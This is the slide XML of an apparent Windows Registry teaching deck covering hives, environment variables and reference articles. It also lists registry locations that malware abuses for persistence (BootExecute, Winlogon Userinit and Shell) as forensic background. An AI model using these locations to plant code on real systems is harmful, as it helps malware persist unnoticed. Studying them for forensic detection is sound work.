            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the left pane, you have ‘groups’ of keys which have sub-nested keys in them with several values set in them. These groups, like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>’, are called ‘Hives’</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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079081"/>
            <a:ext cx="8291240" cy="2230239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3376224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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>lifewire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>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751" y="2060848"/>
            <a:ext cx="619125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796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5" y="2675467"/>
            <a:ext cx="8208912" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Variables have a percent sign on both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>sides:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>                              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ThisIsAVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a: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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows Environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Variables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ss64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3230931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7804389" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Understanding the Registry on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>University of Connecticut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Is a REG File (And How Do I Open One)? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>BRADY GAVIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to create a Registry Key in Windows 11/10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Anand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Khanse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>4 Tools to Decode and Convert Windows Registry Hex Values to Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Raymond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to Create Registry Key in PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Adnan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Shabbir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Add or Delete Items from Right Click Context Menu in Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>WebNots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000"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2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Articles of Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Keys</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1557302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2675467"/>
            <a:ext cx="8568952" cy="3574696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\SYSTEM\ControlSet002\Control\Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Manager\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BootExecute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1700" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssms.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) manages the sessions for each of your users in the Windows environment. After that, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WinLogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> process starts which is spawned by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows Subsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The value name  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BootExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>always point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autochk.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>authochk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> as it’s used to verify the integrity of the disks before the startup. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>there are other values, the malware will be loaded along-side the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>autochk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> executable, and run for the entirety of the systems’ uptime.</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Key Value Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直線接點 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="5445224"/>
            <a:ext cx="78488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683568" y="5805264"/>
            <a:ext cx="78488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969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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BootExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Key Value Name</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="341784" y="2060848"/>
            <a:ext cx="8460432" cy="4330375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3653254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2675467"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\Software\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsNT</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CurrentVersion</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Winlogon</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UserInit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKCU\Software\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsNT</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CurrentVersion</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Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\Software\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
